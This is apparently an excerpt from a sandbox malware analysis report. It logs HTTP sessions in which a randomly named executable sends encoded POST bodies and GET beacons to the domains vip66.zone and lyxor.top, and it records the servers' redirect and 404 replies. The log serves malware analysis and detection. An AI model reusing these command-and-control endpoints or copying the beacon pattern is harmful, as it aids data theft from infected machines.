                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.4497513.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:14.231529951 CEST686OUTPOST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4d 74 43 6e 50 6a 42 4b 58 48 6d 34 51 55 6b 70 59 2b 33 77 53 39 32 63 67 58 75 71 31 6c 39 33 33 41 31 74 4e 70 32 7a 4f 56 45 2b 73 4f 38 4a 4b 43 4e 52 4e 49 6d 76 67 58 57 78 4a 7a 4a 77 4f 6a 4d 4b 6b 4f 74 41 4e 2f 42 6b 74 6f 33 4c 58 7a 66 46 2f 7a 59 5a 36 2f 4c 77 41 76 6f 72 48 70 79 35 75 31 53 76 32 64 59 2b 64 74 6b 75 51 5a 70 44 32 43 43 6f 68 39 65 4e 35 74 6d 71 39 4a 4a 72 57 32 62 75 34 58 61 39 42 51 47 32 4d 4a 44 37 63 53 71 46 4e 76 4b 35 43 4f 63 5a 73 45 34 59 6d 35 66 50 42 44 73 63 44 71 73 59 6c 7a 48 70 49 75 6b 42 5a 2f 37 48 46 4d 77 56 65 51 3d 3d
                                                              Data Ascii: 3tV=MtCnPjBKXHm4QUkpY+3wS92cgXuq1l933A1tNp2zOVE+sO8JKCNRNImvgXWxJzJwOjMKkOtAN/Bkto3LXzfF/zYZ6/LwAvorHpy5u1Sv2dY+dtkuQZpD2CCoh9eN5tmq9JJrW2bu4Xa9BQG2MJD7cSqFNvK5COcZsE4Ym5fPBDscDqsYlzHpIukBZ/7HFMwVeQ==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.4497523.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:16.786643982 CEST706OUTPOST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4d 74 43 6e 50 6a 42 4b 58 48 6d 34 43 48 38 70 55 39 66 77 56 64 32 54 75 33 75 71 37 46 39 7a 33 48 39 74 4e 74 4f 6a 4f 6d 67 2b 74 72 41 4a 59 44 4e 52 4d 49 6d 76 35 6e 57 6f 48 54 4a 35 4f 69 77 34 6b 50 42 41 4e 38 39 6b 74 73 37 4c 58 67 33 43 2f 6a 59 66 79 66 4c 49 64 2f 6f 72 48 70 79 35 75 31 48 41 32 64 51 2b 64 38 55 75 52 34 70 4d 2f 69 43 72 6f 64 65 4e 6f 39 6d 75 39 4a 4a 4a 57 33 33 58 34 52 65 39 42 55 4f 32 64 39 58 38 48 43 71 44 53 66 4c 2b 47 63 4d 51 6b 6d 5a 44 34 62 7a 56 42 6d 49 6c 43 73 39 43 30 43 6d 2b 61 75 41 79 45 34 79 7a 49 50 4e 63 46 51 47 44 64 43 56 54 42 4f 39 68 53 56 37 72 6f 4e 52 56 79 75 6f 3d
                                                              Data Ascii: 3tV=MtCnPjBKXHm4CH8pU9fwVd2Tu3uq7F9z3H9tNtOjOmg+trAJYDNRMImv5nWoHTJ5Oiw4kPBAN89kts7LXg3C/jYfyfLId/orHpy5u1HA2dQ+d8UuR4pM/iCrodeNo9mu9JJJW33X4Re9BUO2d9X8HCqDSfL+GcMQkmZD4bzVBmIlCs9C0Cm+auAyE4yzIPNcFQGDdCVTBO9hSV7roNRVyuo=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.4497533.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:19.327594995 CEST10788OUTPOST /ymla/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              Origin: http://www.vip66.zone
                                                              Referer: http://www.vip66.zone/ymla/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 4d 74 43 6e 50 6a 42 4b 58 48 6d 34 43 48 38 70 55 39 66 77 56 64 32 54 75 33 75 71 37 46 39 7a 33 48 39 74 4e 74 4f 6a 4f 6d 6f 2b 74 65 4d 4a 62 67 6c 52 50 49 6d 76 6d 58 57 74 48 54 49 72 4f 69 70 78 6b 50 38 33 4e 36 78 6b 75 4a 6e 4c 47 42 33 43 77 6a 59 66 2b 2f 4c 7a 41 76 6f 2b 48 71 61 39 75 31 58 41 32 64 51 2b 64 2f 4d 75 57 70 70 4d 7a 43 43 6f 68 39 66 4d 35 74 6d 57 39 4a 41 32 57 33 7a 59 74 78 2b 39 42 31 79 32 4f 6f 44 38 61 53 71 42 52 66 4c 63 47 63 42 49 6b 6d 31 50 34 66 7a 72 42 67 30 6c 41 4a 41 4c 6e 47 57 6e 4c 76 41 59 53 34 71 51 49 39 77 65 44 6e 57 6e 53 42 51 54 64 76 52 77 49 53 44 6c 79 38 5a 43 6d 72 57 6d 55 75 70 47 37 2b 69 6c 76 7a 32 53 33 6c 76 76 64 72 73 54 4a 38 52 34 39 73 59 4d 47 45 4e 46 63 6a 4a 56 4a 62 34 6a 6d 6b 51 33 63 43 39 53 4f 63 56 47 63 59 51 6f 68 61 6c 2b 69 2b 49 78 4d 39 78 53 50 44 6f 6b 69 47 31 4e 49 4f 53 45 70 6a 5a 6c 67 68 4c 41 54 34 59 66 38 79 5a 64 4c 41 38 43 2f 34 54 5a 53 74 6d 4a 4e 42 4d 34 51 67 67 32 4d 6e [TRUNCATED]
                                                              Data Ascii: 3tV=MtCnPjBKXHm4CH8pU9fwVd2Tu3uq7F9z3H9tNtOjOmo+teMJbglRPImvmXWtHTIrOipxkP83N6xkuJnLGB3CwjYf+/LzAvo+Hqa9u1XA2dQ+d/MuWppMzCCoh9fM5tmW9JA2W3zYtx+9B1y2OoD8aSqBRfLcGcBIkm1P4fzrBg0lAJALnGWnLvAYS4qQI9weDnWnSBQTdvRwISDly8ZCmrWmUupG7+ilvz2S3lvvdrsTJ8R49sYMGENFcjJVJb4jmkQ3cC9SOcVGcYQohal+i+IxM9xSPDokiG1NIOSEpjZlghLAT4Yf8yZdLA8C/4TZStmJNBM4Qgg2MngUZ0k/pDDQPvfRXFuCJxYW3NvUZgqVoMqWPLl8SZPoiJbjQLcp6MBy/tnA5MLdYv3xeQsfiXfk5a/OZbGfnAdUAiTyhBGAlxNwB68tOtDVM2n1qIttHTD4idzZtSjkhSPexh4j2tJvIQgKq95YmivZQPhMLxmwz/R+HoohF+LI3WlwP6s/RokeGu+SqOVpEqYUUULIbvSIrSooOH2qgwvbi5q4r+5FPwwARyhoW2nuVQUq/fEhhzINwn58DNh36eLhHSNtOSeELI45iqIgTaZFq6kGDVnQZyORHQTF8/uMfJ1d2XnbX+msf57g7o+MK2Q0a+JAS/9KvZ7nrTApnaSXnKN8rJJ3kf3/ACU6O2ZACm+LqY5PoWh8HLnSsZZnYqoE5w/ecMvwTlbNGHbzPij13gqJodwvpNCe+a5lOyqXqkVb2vMefv4ZbhtUGOrbBjQCeJMgyc2juRxO7jaVXSseeZdMb/3ZpIqUvU32GqfjUnv96OFqt+Mwr6vW7DwUyLivBmKUNVRQl+E4rk0emqBGyMO75dVCzMlx/VYiULTja18VQanxtbZbwlt87BQRyGWLM4YLYHnm2/T3xgBGX7oWmIU6K2dAkg2j7zUgshgBbDaLJvSeiql83q6iwABFjx1ho/rcQ6vX5VYlZmrqQlRpR2Ep/Xj5sV04 [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.4497543.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:21.866998911 CEST429OUTGET /ymla/?3tV=BvqHMV0nWlC/dF1qQ9SGd92esk2/yxlmtXJ+OaeVO1Q20dRfY2N3KYLrsWHVHDovdhcIqetDFv1Luq7dPE3I+iALpNHIcfNrfKqLui+R/P1jGO4yN6sj+Bs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.vip66.zone
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:22.321814060 CEST398INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Thu, 12 Sep 2024 13:06:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 74 56 3d 42 76 71 48 4d 56 30 6e 57 6c 43 2f 64 46 31 71 51 39 53 47 64 39 32 65 73 6b 32 2f 79 78 6c 6d 74 58 4a 2b 4f 61 65 56 4f 31 51 32 30 64 52 66 59 32 4e 33 4b 59 4c 72 73 57 48 56 48 44 6f 76 64 68 63 49 71 65 74 44 46 76 31 4c 75 71 37 64 50 45 33 49 2b 69 41 4c 70 4e 48 49 63 66 4e 72 66 4b 71 4c 75 69 2b 52 2f 50 31 6a 47 4f 34 79 4e 36 73 6a 2b 42 73 3d 26 49 68 6b 54 62 3d 78 50 66 48 47 30 6f 38 6b 5a 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3tV=BvqHMV0nWlC/dF1qQ9SGd92esk2/yxlmtXJ+OaeVO1Q20dRfY2N3KYLrsWHVHDovdhcIqetDFv1Luq7dPE3I+iALpNHIcfNrfKqLui+R/P1jGO4yN6sj+Bs=&IhkTb=xPfHG0o8kZI8"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.449755203.161.43.228805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:27.802988052 CEST683OUTPOST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 30 59 66 42 58 65 4a 67 5a 55 34 4e 4b 57 32 4c 55 4a 44 6d 78 33 43 62 38 75 70 49 4f 2f 4d 6b 50 45 33 31 6f 6b 31 5a 49 4d 59 66 43 76 2f 4f 48 7a 41 32 68 77 4e 67 2b 6f 65 42 50 34 32 52 6d 75 4e 59 61 41 42 38 31 39 35 6a 4f 6e 76 34 53 55 4f 4d 53 50 2b 2f 77 6e 79 33 69 78 7a 59 54 51 6f 2b 38 44 72 6f 53 55 34 41 59 32 70 48 75 59 43 6b 6d 4b 74 49 43 55 74 31 74 52 4b 62 77 69 4d 46 39 73 52 53 44 57 32 65 6d 4b 78 69 33 2b 58 4c 74 59 4f 48 45 4e 71 49 6b 71 55 52 69 78 53 4e 75 63 49 2f 78 57 57 70 47 73 61 59 55 37 32 56 55 6e 6c 71 41 6a 6b 38 4e 30 72 42 4f 67 3d 3d
                                                              Data Ascii: 3tV=0YfBXeJgZU4NKW2LUJDmx3Cb8upIO/MkPE31ok1ZIMYfCv/OHzA2hwNg+oeBP42RmuNYaAB8195jOnv4SUOMSP+/wny3ixzYTQo+8DroSU4AY2pHuYCkmKtICUt1tRKbwiMF9sRSDW2emKxi3+XLtYOHENqIkqURixSNucI/xWWpGsaYU72VUnlqAjk8N0rBOg==
                                                              Sep 12, 2024 15:06:28.382606030 CEST658INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:28 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.449756203.161.43.228805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:30.358347893 CEST703OUTPOST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 30 59 66 42 58 65 4a 67 5a 55 34 4e 4b 31 2b 4c 59 4b 72 6d 6b 6e 43 61 6c 65 70 49 5a 76 4d 67 50 45 72 31 6f 6c 41 55 49 2b 4d 66 44 4c 37 4f 47 79 41 32 67 77 4e 67 31 49 65 45 52 49 33 66 6d 75 4a 71 61 42 74 38 31 35 52 6a 4f 69 4c 34 53 69 47 4c 53 66 2b 39 38 48 79 31 2f 42 7a 59 54 51 6f 2b 38 44 58 53 53 55 41 41 59 47 5a 48 76 39 2b 6c 6f 71 74 4c 55 45 74 31 70 52 4b 58 77 69 4d 33 39 74 4d 33 44 55 4f 65 6d 49 70 69 35 50 58 49 6a 59 4f 46 41 4e 72 4a 79 76 68 7a 34 55 76 68 67 74 31 61 35 45 48 50 44 71 4c 43 46 4b 58 43 47 6e 42 5a 64 6b 74 49 41 33 57 49 56 6a 30 58 77 78 64 41 47 78 64 57 55 42 74 30 41 55 72 4a 50 73 73 3d
                                                              Data Ascii: 3tV=0YfBXeJgZU4NK1+LYKrmknCalepIZvMgPEr1olAUI+MfDL7OGyA2gwNg1IeERI3fmuJqaBt815RjOiL4SiGLSf+98Hy1/BzYTQo+8DXSSUAAYGZHv9+loqtLUEt1pRKXwiM39tM3DUOemIpi5PXIjYOFANrJyvhz4Uvhgt1a5EHPDqLCFKXCGnBZdktIA3WIVj0XwxdAGxdWUBt0AUrJPss=
                                                              Sep 12, 2024 15:06:30.952228069 CEST658INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:30 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.449757203.161.43.228805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:32.996753931 CEST10785OUTPOST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 30 59 66 42 58 65 4a 67 5a 55 34 4e 4b 31 2b 4c 59 4b 72 6d 6b 6e 43 61 6c 65 70 49 5a 76 4d 67 50 45 72 31 6f 6c 41 55 49 2b 55 66 43 34 7a 4f 48 52 6f 32 6a 77 4e 67 70 34 65 46 52 49 33 53 6d 75 78 75 61 42 52 4b 31 2f 56 6a 4f 45 58 34 44 77 75 4c 64 66 2b 39 79 58 79 77 69 78 7a 4a 54 51 34 36 38 48 33 53 53 55 41 41 59 46 42 48 70 6f 43 6c 6c 4b 74 49 43 55 74 78 74 52 4c 4b 77 69 55 6e 39 74 49 4a 43 67 79 65 6d 6f 35 69 31 64 50 49 76 59 4f 44 4d 74 71 61 79 76 6c 46 34 55 62 62 67 74 51 78 35 47 62 50 43 4d 53 61 57 4a 6a 75 58 56 59 45 47 57 31 50 45 55 71 34 63 6b 45 39 2f 67 56 68 45 42 4a 30 56 78 34 38 63 6c 33 53 57 38 66 44 47 39 30 6b 50 55 54 52 79 44 39 34 6d 56 68 41 43 59 6c 4b 69 4c 41 72 44 59 49 43 4e 32 61 35 4d 68 42 49 70 45 38 55 45 6c 53 57 6e 78 76 48 6f 38 66 36 6d 30 44 78 61 62 41 53 39 70 53 72 6e 78 77 65 42 35 67 34 2f 68 6a 63 4f 71 48 38 32 77 32 48 6a 77 32 67 50 75 68 6a 38 48 71 61 70 67 72 36 2b 4f 71 65 78 52 47 53 72 50 70 32 37 52 6d 4f 37 51 [TRUNCATED]
                                                              Data Ascii: 3tV=0YfBXeJgZU4NK1+LYKrmknCalepIZvMgPEr1olAUI+UfC4zOHRo2jwNgp4eFRI3SmuxuaBRK1/VjOEX4DwuLdf+9yXywixzJTQ468H3SSUAAYFBHpoCllKtICUtxtRLKwiUn9tIJCgyemo5i1dPIvYODMtqayvlF4UbbgtQx5GbPCMSaWJjuXVYEGW1PEUq4ckE9/gVhEBJ0Vx48cl3SW8fDG90kPUTRyD94mVhACYlKiLArDYICN2a5MhBIpE8UElSWnxvHo8f6m0DxabAS9pSrnxweB5g4/hjcOqH82w2Hjw2gPuhj8Hqapgr6+OqexRGSrPp27RmO7QNVCE3vmD+WzTjzTTHEmPn7wFvyRqYgOUqJWMSQVSINZ++xKlzZXb0bswY5P1i+191Y0iAAzstXvsT7xRu7gAt71xG3FVNXNnd5YBMh9V9rAOjjL9YIuUYM6yAiE75B+1dvbCPcJxBHeFlpEOC3YW5AKNzGU16/zk/5zfliqKsZdR3W38GnMkF1uBHtAGK5c0H0Ut5yiNtjjG+2z5QuX2tMb+4X9cRc/U/msQLPwvJVEiNjrtFzgVfjOwdBdSQ8jlpAhDkoA8YHGLIzSnFIDjdbKYBT87WuAuUzv9OWAWRt3OLDqjw+W+H5CiJUQ3t8qvdTKfTIR5nbyQ2wPc5BZx9nkw4tKtzmtBOOS1QTE6nQtQHKkazKB0tDmXqc0Wu58KXDwoC3PAklBVI64keP9xPCgj2kxgpalKZiChOKpynOluuOXisdfKDXiJIrDoJMo2tTobg+Ie2bHWRoAXhD4pAcUlgMofdTPU15bR5xsxieiapW9yZAZRzQ04Q81T5Zkm/Ky1bW1+4DPFy7KAVBu4eF9NqWyw1RFN8cacIojKD+KBLrrepUqjD0bm67NNrzsgG/tMKKZjcsSLiU83t7ZxWKPw4XOaCuaYIPPaBsGn64vjyAtIlbjG7lHtn1HCeUjlLNL76ycwNIVcLb8FpPz9WkONaDCeBtPdZT [TRUNCATED]
                                                              Sep 12, 2024 15:06:33.600950956 CEST658INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:33 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.449758203.161.43.228805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:35.570231915 CEST428OUTGET /top4/?3tV=5a3hUq11SmISK3qHdKia2mXgwLRkVM4pZnP+iXsVHcY4SpqJYUoammEh9pPyYI3IhaBpEAAW18wtS0XedlaJcs6ggHC5hAq1Qhwp4jbHazxRVHta3ZSkp7g=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:36.196917057 CEST673INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:36 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
